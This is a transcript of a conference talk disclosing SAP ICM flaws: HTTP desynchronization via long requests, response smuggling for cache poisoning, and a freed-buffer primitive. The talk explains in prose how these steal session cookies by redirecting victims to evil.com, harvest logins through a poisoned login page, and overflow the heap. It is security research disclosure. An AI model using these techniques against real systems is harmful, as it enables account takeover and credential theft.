So yeah, this is Internal Server Error: exploiting inter-process communication with new desynchronization primitives. Please welcome Martin Doyhenard. Hello everyone, welcome to Internal Server Error: exploiting inter-process communication with new desynchronization primitives. My name is Martin Doyhenard, I'm a security researcher at Onapsis, which is a company focused on enterprise software security. And among the different enterprise software developers, SAP is probably the most popular one, with over 400,000 customers, and this includes 90% of the Fortune 500. Most of the services that SAP provides are for managing business processes, such as financials, operations, human capital, customer relationships, supply chain, and many other kinds of software that manage the critical assets of a company. And to do so, they provide a lot of modules that are based on web services accessible through HTTP, and this is true for both Java and ABAP, and also for S/4HANA and the cloud. And to expose these kinds of services, they use the same proprietary HTTP server in all their products, which is called the Internet Communication Manager. So what is this Internet Communication Manager, or ICM? Well, it's the component that handles all the communication between the outside world and the SAP system, and this includes all communication with clients, such as different employees or customers, and also with other systems, including other SAP systems. Among the different protocols that can be used there is P4, which is a proprietary protocol similar to RMI, and also IIOP and SMTP, but the main purpose of the Internet Communication Manager is to handle HTTP and HTTPS communications. And this is really important: this is the component that will be exposed and present by default in all SAP installations in the world.
Therefore, we will find it in all SAP products, and it is quite important, and that's why I decided to do this research: any time we find an SAP system, the HTTP service will be exposed, and we will find many SAP systems exposing this to the Internet. But before I could find any vulnerability, I needed to understand how this Internet Communication Manager worked, and of course we don't have the source code, because SAP does not like open source (I guess they know that would kill the fun), so I had to reverse-engineer the entire component. And you can see that SAP provides us with a small diagram, which doesn't say too much about the architecture. We can see some components, but it's not really detailed, so I made a small abstraction of this diagram so that you can understand how this works. Also, I will abstract away a lot of internals. If you want to learn more about this, you can ask me later, write me on Twitter, or see the white paper. So first, we will say that the ICM is the HTTP server that will receive connections from clients, and when a client starts a TCP connection, a worker thread, which is an internal thread of the process, will be assigned to this TCP connection.
The idea is that this worker thread handles all the requests and responses for this specific client. So when a client sends a request, it will be received by the worker thread, which will use the HTTP parser to understand the request. Then it will use some internal HTTP handlers, which I will talk about later, to try to resolve the request internally, and if that's not possible, which will be the case most of the time, it will send the request to another process. This is because the business logic of an SAP system is not inside the ICM; it's actually programmed in Java or ABAP, therefore the request will be sent to another process. And to do so, it will use something called memory pipes, which I will also explain in a minute, to efficiently send this data to the other process, which is called the worker process. The worker process will generate a response, send it back through these memory pipes to the ICM, and the ICM will forward it to the client. So again, what are these memory pipes? Well, MPI is how SAP calls it; it's a framework that supports the exchange of data between the ICM and the worker process, which can be Java or ABAP. The idea is that this framework will be used to send the data, but not to copy all the requests and responses, because that would be inefficient. So the MPI uses shared memory to do this. It will use MPI buffers, which are just fixed-size buffers of 64 KB, and they will be stored in shared memory, and instead of sending the entire request or response and copying it from one process to another, it will just send a pointer, called an MPI pointer, to these MPI buffers. It will use the MPI handler, which is a class that manages all these communications. So let's see an example. First, when a request arrives at the ICM, actually at the worker thread, the input/output handler will receive it. This is just a TCP socket that has an internal buffer to store everything that comes from the Internet.
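The MPI scheme described above can be sketched with a toy model (all names here are illustrative, not SAP's actual API): fixed-size buffers live in a shared pool, and only a small "MPI pointer" (here, just a buffer index) crosses the process boundary.

```python
# Toy model of the MPI shared-memory scheme (illustrative names only).
BUF_SIZE = 64 * 1024  # MPI buffers are fixed-size

class MpiHandler:
    def __init__(self, nbuffers=8):
        self.shared = [bytearray(BUF_SIZE) for _ in range(nbuffers)]
        self.free = list(range(nbuffers))   # free-buffer bookkeeping

    def reserve(self):
        return self.free.pop()              # returns an "MPI pointer" (index)

    def write(self, ptr, data):
        self.shared[ptr][:len(data)] = data

    def read(self, ptr, n):
        return bytes(self.shared[ptr][:n])

    def free_buffer(self, ptr):
        self.free.append(ptr)

# ICM worker thread: reserve a buffer, copy the request in, hand over the pointer.
mpi = MpiHandler()
ptr = mpi.reserve()
request = b"GET /index HTTP/1.1\r\nHost: sap\r\n\r\n"
mpi.write(ptr, request)

# Worker process: reads via the pointer; no copy of the request crosses processes.
assert mpi.read(ptr, len(request)) == request
mpi.free_buffer(ptr)
```

The point of the design is that only the pointer is exchanged, so a 64 KB request costs one shared-memory write, not a copy per process hop.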
When the ICM worker thread is ready to receive and handle a request, it will first reserve an MPI buffer, then it will store the request there. This is all done using the MPI handler. Then it will use the HTTP parser and try to resolve the request using internal handlers, and if that fails, it will send the request to the worker process. This is done by sending just the MPI pointer. And now the Java or ABAP process will have a reference to this request. Then it will generate a response, and it will also reserve a new MPI buffer, which will store the response. Then it will send the MPI pointer back to the worker thread, and the worker thread will forward the response back to the client. Then both MPI buffers will be freed one by one, and the references will be lost. So I also said that there are some internal handlers that are used to try to resolve the request. They are inside the ICM; they are actually functions that try to generate a response out of a request. When a request arrives, there will be a list of handlers that will be used, and the component that decides which handlers should be included is the HTTP parser: it will look at the URL, and depending on the URL, it will know which handlers should be included in the list, and then those handlers will try to resolve the request. When any handler is able to resolve a request, the other handlers will be deleted from the list, and the response will be sent back to the client. I'm going to show the handlers in the order in which they are called when they are included in the list. So first, we have the cache handler. This is present by default, and it's always included in the list: no matter what the URL is, it's always in the handler list.
And the cache handler will do what we all expect: it will try to resolve the request by looking at the cache, and if it has a stored object for that URL, it will return the response to the client. Then we have the admin handler and the authentication handler. They are both present by default, but they are only going to be called depending on the URL, if the pattern matches. For the admin handler, there is a prefix, which is /sap/admin, and for the authentication handler, there are some hardcoded values in the ICM that are used to decide if the handler should be included or not. Then we have the modification handler, the file access handler, and the redirect handler. They are not present by default; they need to be set in a configuration file before the SAP system starts, so we are not going to see more about them. And finally, we have the Java and the ABAP handlers. Which one is used depends on how the system is configured, and they are always included by default, but they are not going to try to resolve the request internally; they will just send the request to the worker process. As you can see, there is a specific function for each of these handlers. We also have other handlers, like the log handler, but that's not really interesting for us because it cannot generate a response out of a request. So let's see an example of how a request is resolved using internal handlers. Again, when a request arrives, it will be stored in the input/output handler, and in this case, we see that the request is a GET to /sap/admin. The worker thread will reserve a new MPI buffer and place the request there, and now the HTTP parser will start including the different handlers in the list. First, the cache handler, because it's always included.
Then, in this case, the admin handler, because of the /sap/admin prefix, and then the Java or ABAP handler, depending on the worker process that is going to be used. Now the cache handler is going to be called. In this case, let's say it fails; it cannot resolve the request. So the admin handler is going to be called after it, and in this case, we obtain a response out of the admin handler. This response is not going to be placed in shared memory, because that's not necessary; we will not send it to the worker process. The response is going to be placed in the heap, then all the other handlers will be deleted, and the response will be forwarded to the client. Again, the MPI buffer will be freed, and the reference will be lost. So, as I said, MPI buffers are fixed-size. This means that they can only hold 64 KB of data. So what if we send a longer request? And I'm going to call this a long request even though it's not that long, it's just over 64 KB, but what if we send something that cannot fit inside one MPI buffer? Let's see an example. We send a request with a content length of 66,000 bytes. The ICM will first reserve an MPI buffer, as always, and it will only place the first 64 KB of the request that arrived from the client. This is because the internal handlers are supposed to resolve requests that do not contain a body, that are just simple requests with some special headers. So the ICM is not expecting to use the rest of the body, or the rest of the request, until the worker process is required. Again, the HTTP parser will read the request and call some handlers. In this case, the cache handler is not able to resolve the request.
And when the Java or ABAP process is called, so when we send this request to the worker process, in this case we will need the rest of the request, because of course the Java or ABAP process will use the body of the request; the business logic needs this kind of data. So the ICM will reserve as many MPI buffers as required, it will store the rest of the request there, and it will send all the MPI pointers to the worker process. Now the worker process will have the references, and it will use them to generate a response. And again, the worker process will reserve an MPI buffer, store the response, and send it to the worker thread, and the worker thread will forward this response back to the client. Now, as I said previously, these MPI buffers are freed one by one when we have a simple request. However, when we have a multi-buffer request, the MPI free-all-buffers function is going to be called, which will free all the MPI buffers that are associated with this worker thread. And then the references will be lost. So let's look at the first vulnerability. As I said, the worker thread is not expecting to resolve a request using the body, because internal handlers shouldn't use that kind of information. But what if we send a long request that is not handled by the worker process, but is instead handled by an internal handler? So again, as I already explained, in this case we have a GET request to /sap/admin, and it's a long request containing 66,000 bytes. Therefore, only the first 64 KB will be stored in an MPI buffer. Then the parser will include the different handlers. The cache handler will fail again, but in this case, the admin handler is able to generate a response. So this response will be sent to the client, then all the handlers will be removed, the MPI buffer will be freed, and the request-response cycle will be completed.
But as you can see, we still have data from the previous request in the input/output handler. So now, when the worker thread tries to read a new request, it will consider this, of course, as a new, isolated request. So if you know something about HTTP desynchronization, which I hope you do if you came to this talk, you know that this is a vulnerability, and a serious one. And this is because whenever we send the kind of request that you can see in the slides, which contains a GET request to /sap/admin, it will be resolved by an internal handler, as we saw. And a proxy will forward this as a single request without seeing any problem, because there is nothing that tells the proxy that this is a special request. Actually, it is HTTP RFC compliant, so there is no problem: it's just a GET request with a big content length, but the entire body is included in that content length. But when this request arrives at the ICM, it will be split, and the last part, which is the GET to /smuggled, will be used as an isolated request. Therefore, there will be a desynchronization between the proxy, any proxy in the world, because, again, any proxy will see this as one isolated request, and the ICM. And this is a serious vulnerability. It's actually a CVSS 10, because it allows us to compromise any SAP installation in the world through its most exposed service, and I'm going to show you some examples of how to exploit this to actually take control of victims' requests and sessions and the actual applications. So my first example is going to use HTTP request smuggling, and I'm going to use the NWA endpoint, which is present, again, in all SAP systems, and is used to redirect any user to the login URL. And it provides two really interesting features. First, an open redirect, which will allow us to set anything we want as the relocation host by using the Host header.
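The desync payload just described can be sketched as follows (a lab-only illustration; the host names are hypothetical). The outer GET is resolved by the internal admin handler, which only ever reads the first MPI buffer, so everything after the 64 KB of padding stays unread in the input/output handler and is later parsed as a brand-new request:

```python
# Sketch of the ICM desync payload: one RFC-compliant request to the proxy,
# two requests from the ICM's point of view (names/hosts are illustrative).
MPI_BUF = 64 * 1024

def build_desync_payload(smuggled: bytes) -> bytes:
    body = b"A" * MPI_BUF + smuggled      # padding fills exactly one MPI buffer
    header = (b"GET /sap/admin HTTP/1.1\r\n"
              b"Host: target\r\n"
              b"Content-Length: " + str(len(body)).encode() + b"\r\n\r\n")
    return header + body                  # body length matches Content-Length

smuggled = b"GET /smuggled HTTP/1.1\r\nHost: target\r\n\r\n"
payload = build_desync_payload(smuggled)
```

Note that the declared Content-Length covers the whole body, which is why any front-end proxy forwards this as a single valid request.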
As you can see, I can place the attacker's host in the Host header, and this will be reflected in the Location header of the response. This is actually a feature; it's not a vulnerability by itself, because it cannot be exploited by itself. And we also have a parameter reflection, which will allow us to reflect anything we place in the body of the request into the query string of the relocation URL. You can see that the line breaks are replaced with spaces. So, how can we combine this with the desynchronization vulnerability to take control of victims' requests and also of victims' session cookies? Well, first, the attacker will send a payload which will smuggle an entire request. And as you can see, it will be forwarded entirely by the proxy, but it will be split in the ICM. The first part will be resolved by the internal handler, and the response will be sent back to the attacker. But the rest of the request, the smuggled one, will stay in the ICM. And this is because its content length states that there should be 100 bytes of body, but we didn't send anything in the body, so it will wait for more data. Also, you can see this is a POST request to NWA, and the Host header is evil.com, a host controlled by the attacker. Now, when a victim sends a request to the proxy, the proxy will just forward it, and in the ICM, it will be concatenated to the smuggled message that we injected. So the first 100 bytes of the victim's request will be used as part of the body of this request. And if you remember, the NWA endpoint will allow us to generate a response that, in this case, will redirect the victim to evil.com, and it will also send, in the query string of the redirect, the first 100 bytes of the victim's original request, which in this case also contains the cookies.
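The cookie-theft variant might be sketched like this (the endpoint path and hosts are illustrative, not the exact SAP URLs). The smuggled POST declares 100 body bytes but sends none, so the first 100 bytes of the victim's next request become its body and are reflected into the redirect toward the attacker's host:

```python
# Sketch of the session-hijack payload (lab use only; names are hypothetical).
MPI_BUF = 64 * 1024

inner = (b"POST /nwa HTTP/1.1\r\n"
         b"Host: evil.com\r\n"            # open redirect: ends up in Location
         b"Content-Length: 100\r\n\r\n")  # no body yet: the ICM waits for data

body = b"A" * MPI_BUF + inner
payload = (b"GET /sap/admin HTTP/1.1\r\n"
           b"Host: target\r\n"
           b"Content-Length: " + str(len(body)).encode() + b"\r\n\r\n") + body
```

Once this sits in the ICM, the victim's own request bytes, including the Cookie header, complete the POST and come back to the attacker in the redirect's query string.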
So when this is received by the victim's browser, the browser will send another request, but in this case to evil.com, which is controlled by the attacker. And so the attacker will receive this request, which also contains the victim's cookies. Now, we will be able to hijack as many requests, cookies, and sessions as we want, but for each request we hijack, we will need to send a new payload, okay? So something really special about this vulnerability is that we are not using any kind of invalid request, so any proxy will see this and say, okay, this is completely RFC compliant. We are not sending any strange header, anything strange at all. And this means that we will be able to replicate the attack and send it using an HTML form, and also JavaScript. So the idea is, as you can see in the slide, I created a form that will send a request to an SAP system that will be resolved by an internal handler, in this case the admin handler. It will also contain padding to make this a long request, and finally, at the end, it will place the smuggled request. So when a victim receives this form, the JavaScript will submit the form, and so the attack will be sent, in this case, not from the attacker but from the victim. So now the victim became the attacker, and this will actually continue forever, because the victims, when making a request to the SAP system, will receive the payload again, will be redirected to evil.com, and will then send the attack again. So again, we can place all of this on evil.com; that's the idea. Also, we can use the same kind of attack when we find a vulnerability that does not require any invalid or forbidden header, like the one found last year in HAProxy. In those cases, we can use DNS rebinding to be able to send those extra headers, and we can use this technique in many other ways.
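A heavily simplified sketch of that self-replicating attack page follows: an auto-submitted HTML form whose body carries the padding and the smuggled request, so each victim relaunches the attack from their own browser. The real payload encoding via `text/plain` form fields is more involved, and all names and hosts here are hypothetical:

```python
# Simplified sketch of the self-replicating attack page (illustrative only).
def attack_page(target: str = "http://sap.victim:8000") -> str:
    smuggled = "POST /nwa HTTP/1.1\nHost: evil.com\nContent-Length: 100\n\n"
    padding = "A" * (64 * 1024)   # makes the outer request a "long" request
    return (f'<form id="f" action="{target}/sap/admin" method="POST" '
            f'enctype="text/plain">\n'
            f'<input type="hidden" name="pad" value="{padding}{smuggled}">\n'
            f'</form>\n'
            f'<script>document.getElementById("f").submit()</script>')

page = attack_page()
```

Serving this page from the attacker's host is what turns a one-shot desync into a persistent, worm-like loop: every redirected victim fetches the page and re-submits the form.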
And if you saw yesterday's talk by James Kettle, you might think this is a really similar technique, because we're actually using the same idea. And even though the nature of the vulnerabilities is different, we found that it is possible to cause this client-side desynchronization, so we are not only going to be able to persist the attack and create smuggling botnets, but also to exploit the browser-server connection. So we will be able to desynchronize even systems that are not using a proxy. This is a really new idea, and yesterday James presented a new methodology; it was a really great talk, I recommend it. And so, as I said, we can exploit this even without a proxy, and we could use social engineering if we are not able to reach the server directly, sending this form via phishing, and even without sending the first request ourselves, we will be able to attack and desynchronize the entire system and obtain the session cookies. So let's see a small demo. Okay, in this demo, the first actor is going to be the client. And as you can see, when the client sends a request to the start page, he will just receive a 200 response. Nothing strange here. As many times as he wants, he will receive the same response, and he is including his cookies in this request. Now the attacker sends the payload, which is going to be resolved by an internal handler, and since it's a long request, we will be able to smuggle another message and inject what is at the end, which is the POST request that we already saw, the POST to NWA. This will be stored in the ICM until more data arrives. So when we send this, we just receive a response; we don't care about that response. And when the victim sends a new request, instead of receiving a 200, he will receive a redirection to the evil.com server.
And now, when he follows this redirection, he will be sending his own cookies, and therefore we will be able to obtain these cookies and, of course, the secret session of the victim. And what we are going to see now is that when he follows the redirection, the evil.com server, which in this case is another server, I don't remember the name, is going to return the form that I already explained. So the browser will send another attack, and this will keep the exploit running. Okay, this is another exploit I'm going to explain. This technique is kind of advanced; I explained these ideas last year at DEF CON. This is called response smuggling, and what we're going to try to do is poison the web cache of a shared proxy. Any time we have a web-caching proxy in the middle and we have a desynchronization vulnerability, we are going to be able to use this technique. I'm going to try to explain it really fast; if you don't really understand it, you can watch my talk from last year, and I guess that will make it clear. So the attacker, in this case, is going to send two GET requests. Actually, the proxy will see two GET requests, but when they are forwarded to the backend, which in this case is the ICM, the first one will be split into three different requests. And in this case, they will not be incomplete requests as we already saw, with a big content length and no body; instead, we are going to smuggle three complete requests. Now, as you can see, the proxy saw two GET requests, but the ICM saw that the first request is a GET, the second one is a HEAD, and the third one is a GET.
You all know that the HEAD request is special, because when you send this kind of request to a server, what we receive is the same response that we would get for a GET request, except that we only receive the headers. What you might not know is that the RFC allows servers to also send a content length, and this is almost always the case; you will see this behavior in almost any server. And the content length, even though one would expect it to be zero because the body is empty, is not: it's the same content length we would get if we had issued a GET request. Therefore, in this case, we see that it's quite a bit longer than zero; it's something like 3,000. So how are proxies going to know that they should ignore this Content-Length header? Well, because they know that they forwarded a HEAD request, and therefore, when they receive the response for this HEAD request, they know that this content length shouldn't be used to determine the length of the body of the response. But if you look at the slides, you can see that this proxy didn't send the HEAD request itself, therefore it doesn't know that the content length should be ignored. So the first response will be sent to the attacker, as always; it is the response for the first GET request. But now the second response is going to be used for a GET request, and in this case, the content length will be used, because the proxy doesn't know this is a HEAD response. And so it will use part of the next response as the body: it will use the headers of the next response as part of this body, and also the rest. And we can build a lot of payloads out of this. We can use this to actually generate malicious responses that contain JavaScript. We can change the content type of different responses.
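The mis-framing can be modeled in a few lines. Here a naive front-end, believing it sent a GET, frames what is actually a HEAD response by its Content-Length and so swallows the start of the next response as body (a toy model, not any real proxy's code):

```python
# Toy model of HEAD-based response desync: framing a headers-only response
# by its Content-Length consumes the following response's bytes as body.
def frame_response(stream: bytes):
    """Naively split one response off the stream using Content-Length."""
    head, rest = stream.split(b"\r\n\r\n", 1)
    clen = 0
    for line in head.split(b"\r\n"):
        if line.lower().startswith(b"content-length:"):
            clen = int(line.split(b":")[1])
    return head + b"\r\n\r\n" + rest[:clen], rest[clen:]

# Backend answers a HEAD: headers only, but Content-Length is non-zero.
head_resp = b"HTTP/1.1 200 OK\r\nContent-Length: 50\r\n\r\n"
next_resp = b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n" + b"X" * 20
framed, remainder = frame_response(head_resp + next_resp)
# 'framed' now contains the next response's status line and headers as body,
# and 'remainder' starts mid-way through that next response.
```

From here the attacker controls where each subsequent response boundary falls, which is exactly what makes the cache-poisoning payloads possible.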
So if we have a response where we can reflect data, like text/plain, and we cannot use it to generate an exploit, well, this can be used to change the content type. Also, if we are able to reflect some data in the headers of the response, we can use that as part of an HTML body. And you will also see that this response contains a Cache-Control header. So if we choose a HEAD request whose response gives us a Cache-Control header, then we are going to be able to poison the cache with this malicious response. And the URL that the poisoned record is going to point to is also chosen by the attacker; we can choose any URL we want. So we can arbitrarily modify any record in the web cache, and we can store this payload there, so that when the client sends a request for the same URL, the proxy will not forward it, but will instead serve what is stored in the cache. Now we are also going to see a demo. Well, I don't know where the demos are. Can I have some help here? Yeah, it should be there. Sorry for that. In this demo, we are going to see how we can poison and modify the web cache of any proxy. I created an exploit that is going to poison any URL we want with a specific payload. In this case, it's going to inject JavaScript that will generate an alert. So the idea, again, is that I use this payload to modify any URL we want and inject the malicious response for that specific endpoint. And I can use this attack for something even better, which is to modify the login page of the SAP system. The idea is, if we can modify anything we want, then why not modify the URL that is used for login, so that when a user loads this HTML, it will actually send the credentials back to the attacker instead of the SAP system. And then we can redirect the victim to another login with extra query string parameters so that it doesn't use the cached version. So now, again, as I said, I'm going to replace the login URL.
This is always going to be used by any SAP user to log in to the application. So I start a server that is going to listen for what this login page sends. Again, this looks like the original login, nothing strange; the URL is still the same, nothing that the user can detect. And when he sends the credentials, instead of being sent to the SAP system, they will be sent to the attacker. And again, we send the request once more just to show that this will work any time, because it's stored in the cache: this will keep working without sending any other payload. Okay, so then I said, well, if I found a vulnerability like this, then I want to learn more about the ICM, and I want to learn how more complex requests are processed. And then I found that the ICM can be configured both for Java and ABAP, I knew that, but that there is a difference: when the ICM is configured for Java, the HTTP server accepts pipelined requests by default, but when it's configured for ABAP, this needs to be enabled explicitly. So we are going to look at the Java case; this will also work for ABAP if it's configured for pipelining. Pipelining means that we are going to be able to receive a payload that contains two requests, and the ICM will be able to split them. Now, these are completely valid and legit requests that can be split using the content length; there is nothing strange about these requests. The process will be the same: the ICM worker thread will reserve a new MPI buffer and store the request there, then the HTTP parser will be called, and the HTTP parser will recognize that there is an extra request. So it will reserve a new MPI buffer and place the rest of the request there.
Now the ICM worker thread will continue processing the first one. It will send the request to the Java process, the Java process will generate the response, place it in shared memory, and send the reference to the worker thread, and the worker thread will forward the response. Then both MPI buffers will be freed, and the request-response cycle will be completed, so the ICM worker thread will be able to continue processing the next pipelined request. Now, remember I said that there is a special condition when we send multi-buffer requests, so long requests, which is that all the buffers are going to be freed using the same function. So what if we send a pipelined request together with a long request? In this example, we are sending a long request and, at the end, a new request. When the worker thread receives this, it will place the first part in an MPI buffer, it will call the HTTP parser, it will call the handlers, and then, when the worker thread is ready to send the request to the worker process, which is the Java process, it will place the rest of the request in a new MPI buffer. But now the HTTP parser will also recognize that there is an extra request, and it will reserve a new MPI buffer and place the extra request there. Everything will continue as we expect: the request will be sent to the Java process, the Java process will generate the response and send it to the ICM, and the ICM will forward the response. But now, remember, we have a long request, so we are going to use MPI free-all-buffers to free all of these buffers, and this is going to free all the buffers associated with the worker thread, including the pipelined one. So now the first three references will be lost, but not the one to the pipelined request, because free-all-buffers does not remove references. This means we will be able to use a request that is inside a freed MPI buffer, and this will cause some problems.
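The free-all bug can be sketched with a small model (illustrative names, not SAP's internals): freeing every buffer tied to the worker thread does not clear the thread's reference to the pipelined request's buffer, leaving a dangling index into the free pool.

```python
# Toy model of the free-all primitive: a dangling reference into the free pool.
class MpiHandler:
    def __init__(self, n=4):
        self.free = list(range(n))
        self.owner = {}                      # buffer index -> worker thread

    def reserve(self, thread):
        idx = self.free.pop()                # LIFO: last freed, first reused
        self.owner[idx] = thread
        return idx

    def free_all(self, thread):
        for idx, t in list(self.owner.items()):
            if t == thread:
                del self.owner[idx]
                self.free.append(idx)

mpi = MpiHandler()
req_bufs = [mpi.reserve("wt1"), mpi.reserve("wt1")]   # long (multi-buffer) request
pipelined = mpi.reserve("wt1")                        # extra pipelined request
mpi.free_all("wt1")          # frees *all* wt1 buffers, including the pipelined one
dangling = pipelined         # wt1 still holds this index, now a free buffer
assert dangling in mpi.free  # another connection can reserve the same buffer
```

The dangerous part is the last line: the buffer is back in the pool while the attacker's worker thread still believes it holds the pipelined request.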
Of course, if the worker thread tries to send this to a Java process, it will generate an error, because the MPI handler knows that this worker thread does not have any reserved buffer, so we will not receive a response. But what happens if another client, from another TCP connection, sends a request while we have the reference to this freed MPI buffer? The worker thread will actually reserve the same MPI buffer, and we will have a reference to another connection's buffer. This can be a real problem, and I'm going to show you why. But first, let me say that this is going to happen a lot, because the MPI handler stores the free buffers in a stack. Even though SAP states that this is a queue, when I reverse-engineered the component I understood that it is a stack; therefore, the last freed buffer is going to be used in the next reservation. So this means that worker thread two will write on top of our request. And you might think, okay, we can use this to obtain a response that is intended for another client. This is not true; we still have the problem of the MPI handler knowing that we don't have a reserved buffer. So what we are going to try to do is write on top of a victim's request, and to do so, we are going to send a pipelined request that is not complete. This can be done by sending a request which does not contain the two line breaks after the headers, or which contains a body that is shorter than what the Content-Length header states. When this happens, the worker thread will be set to read mode; it will wait for more data, and once this data arrives at the ICM, it will be written into the same buffer, starting at the last position that the worker thread wrote. So you can see that if we send the request in two parts, all the data will be written into the same buffer, and the offset will be updated.
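The tampering primitive comes from that per-connection write offset, and can be sketched like this (a toy model with hypothetical contents): the attacker's connection wrote one byte, "X", so its offset is 1; when the attacker's continuation data arrives, it lands at offset 1, on top of whatever the victim's worker thread stored in the reused buffer.

```python
# Toy model of the offset-based tampering primitive (illustrative only).
buf = bytearray(64)
attacker_offset = 0

def attacker_write(data):            # writes tracked by the attacker's offset
    global attacker_offset
    buf[attacker_offset:attacker_offset + len(data)] = data
    attacker_offset += len(data)

attacker_write(b"X")                             # incomplete request: one byte
victim = b"GET /startpage HTTP/1.1\r\n\r\n"
buf[0:len(victim)] = victim                      # victim's request reuses the buffer
attacker_write(b"ET /evil HTTP/1.1\r\n\r\n")     # lands at offset 1, over the victim
assert bytes(buf[:18]) == b"GET /evil HTTP/1.1"  # victim's 'G' + attacker's bytes
```

Everything except the victim's first byte is now attacker-controlled, which matches the "we can tamper all but the first byte" constraint described above.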
So the idea in this case is that we are going to try to tamper with the victim's request and make him obtain a different response than the one he expected. Again, we are going to send a long request with a pipelined request that is going to hijack a new buffer. You can see the MPI buffer at the top. The first request is going to be resolved, okay, and a response will be sent back to the client, and now MPI free-all-buffers will be called and all the buffers will be freed. So then we have an extra reference to this buffer, but it is a free buffer, therefore other worker threads can use it. And when the parser tries to read the request we sent, which is just an extra byte, an X, it will see that this is an incomplete request, and therefore it will be set into read mode and wait for more data. And if we are lucky enough, another worker thread will reserve this buffer and place the request of a victim there. At this point, we will send more data, so that this data is written into this hijacked buffer, and we are going to write starting at the second position, because worker thread one thought that the only byte in this buffer was the X, so it will start writing at the second position, and we will be able to tamper with the whole request of the victim, actually not the first byte, but all the rest of the request. So then, when worker thread two sends the MPI pointer to the Java process, the Java process will use this request and generate the malicious response, then place it in an MPI buffer and forward it to worker thread two, and worker thread two will send it to the victim. So the steps to reproduce this attack, again: the attacker needs to hijack a buffer, this is easy and deterministic; the victim sends a request, and the request is placed in the same MPI buffer, and this is not deterministic, but it happens a lot.
The attacker then tampers with the victim's request, and the victim receives the malicious response. As you can see in the example, when a victim sends a request to the start page, instead of the 200 response they receive a redirection to evil.com. And this attack does not require a proxy, as I already explained, because we are tampering with another TCP connection; we can launch it with or without a proxy.

But maybe you are also wondering why some of these responses do not contain a status code. That is because the buffers are multi-purpose: the same buffer can hold both requests and responses. So in those cases we are not tampering with a request, but with a response. And that is the best way to use this vulnerability: instead of tampering with a request, we are going to tamper with a response, and I'm going to show you why.

Again, we have a free buffer and we hold a reference to it, so we can write more data, and we wait for another client to send a request. Now, in some cases the worker thread will not use the buffer we have a reference to, but a new one, and that is because of timing: if the client of worker thread two sends its request while our reference points to a reserved buffer rather than a free one, worker thread two will use a new buffer. In that case worker thread two places the request in this new MPI buffer and sends it to the Java process. The Java process generates a response, and that response is stored in the same MPI buffer we hold our reference to. So now we are able to write into the very buffer where the worker process placed the response.
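The timing of this response-tampering race can be summarized as a walk-through. This is just a commented restatement of the sequence above as data, not something that runs against a real ICM:

```python
# Rough timeline of the response-tampering race described above: the attacker
# keeps a dangling reference, the victim's request allocates a fresh buffer,
# and the Java response lands in the buffer the attacker can still write to.

timeline = [
    ("attacker", "holds a reference to a freed MPI buffer"),
    ("victim",   "sends a request; worker thread two reserves a NEW buffer"),
    ("icm",      "forwards the victim's request to the Java process"),
    ("java",     "writes the response into the buffer the attacker references"),
    ("attacker", "overwrites that response before it is sent"),
    ("icm",      "sends the tampered response back to the victim"),
]
```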
So if at that point we are able to send more data, this data tampers with the response, and therefore we can write whatever we want into it. We can generate any response we want and exploit this by injecting any script, any headers, anything we want. Now, when this response is received by worker thread two, the response parser is called and the response is forwarded to the client. But then the response cache handler is called as well. If you look at the MPI buffer in the slide, you might notice an extra header that you might not know, called the SAP cache control header. This is an internal header used by the cache handler to decide whether the response should be stored or not. So what we are going to do is place this header so that the response is stored in the internal cache.

And now we can poison any resource we want with an arbitrary response. If we play the role of the client of worker thread two, instead of waiting for a victim to send a request, we can choose which URL is going to be poisoned. So we can poison any URL with anything we want.

In this demo I'm going to do exactly what I just explained. In this case we are not using a proxy, we are attacking the ICM directly; we could also do it through a proxy by encapsulating this attack in the previous one I explained. The exploit tries to hijack a buffer and sends a lot of requests, in this case for the start page, because we are trying to poison the start page in the internal ICM cache. This will require a few attempts; of course this is not deterministic, but it is quite reliable. As you can see, we are going to try it a few times.
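The poisoned response written into the hijacked buffer can be sketched like this. The exact name and format of the internal SAP cache control header are ICM internals; `SAP-Cache-Control` with a TTL value is used here only as an illustrative placeholder:

```python
# Hedged sketch of the response we write into the hijacked buffer so that the
# cache handler stores it. "SAP-Cache-Control" and its "+seconds" value are
# placeholders standing in for the internal header mentioned in the talk.

def poisoned_response(html: bytes, ttl_seconds: int = 86400) -> bytes:
    return (
        b"HTTP/1.1 200 OK\r\n"
        b"Content-Type: text/html\r\n"
        + f"SAP-Cache-Control: +{ttl_seconds}\r\n".encode()  # asks the cache handler to store it
        + f"Content-Length: {len(html)}\r\n\r\n".encode()
        + html
    )

evil = poisoned_response(b"<script>alert('owned')</script>")
```

Once the cache handler accepts a response like this for a chosen URL, every later client requesting that URL is served the attacker's HTML straight from the cache.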
This script adjusts the timing, and it also verifies whether the response has been modified in the cache, simply by requesting the start page and inspecting the response. After a few attempts we get a successful attack. And what's important here is that one successful attack is persistent: with a single attack, every client that requests the start page will receive this response, which is an arbitrary response with arbitrary HTML.

Okay, finally, I'm going to try to explain this part really fast. We can also use this attack to cause a buffer overflow in the heap and eventually obtain remote code execution. Remember I said we were going to tamper with a response; in this example we have not tampered with it yet. The client of worker thread two sends a request that generates a response which already contains the SAP cache control header. This is a valid response. When worker thread two receives it, the response parser is called, the response is sent back to the client, and then the cache handler is called. The cache handler stores the response, and it is actually stored in a file in the file system. First, the cache handler writes some headers into this file, which include the length of the entire response. If we are able to tamper with the response at this exact point, we can force the cache handler into placing in that file a malicious response whose length does not match what the header states. So when another client requests this poisoned resource, the request cache handler will look in the cache, find a response, and use the headers of the cache file to allocate a buffer in the heap. Then it will write all the data into that buffer. But as the data is longer than those 85 bytes, we are able to overwrite other data structures in the heap.
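The arithmetic behind that overflow is worth making explicit. A tiny illustration, assuming an 85-byte allocation as in the talk (the tampered body length is made up for the example):

```python
# Illustration of the length mismatch behind the heap overflow: the cache
# file's header records the original response length, but the tampered body
# swapped in afterwards is longer, so the reader allocates a too-small heap
# buffer and writes past its end. The 300-byte body is an invented example.

ORIGINAL_LEN = 85              # length recorded in the cache file's header
tampered_body = b"C" * 300     # malicious response written after the header

alloc_size = ORIGINAL_LEN      # the reader trusts the header when allocating
overflow = len(tampered_body) - alloc_size
assert overflow > 0            # these bytes land on top of adjacent heap data
```

Those excess bytes are what let an attacker corrupt neighboring heap structures and, as stated next, work toward remote code execution.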
We have demonstrated that it is possible to obtain remote code execution; the only problem is that we need to defeat the randomization.

